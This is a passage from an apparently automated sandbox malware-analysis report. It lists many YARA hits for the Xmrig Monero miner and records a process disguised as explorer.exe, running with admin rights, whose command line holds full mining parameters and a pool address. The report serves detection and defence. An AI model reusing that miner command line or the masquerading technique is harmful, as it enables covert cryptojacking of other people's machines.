• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.917920684.000000000130B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.794400216.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 14:11:02
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.801221568.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.918136554.00000000004BA000.00000004.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.814593137.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.812542531.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis
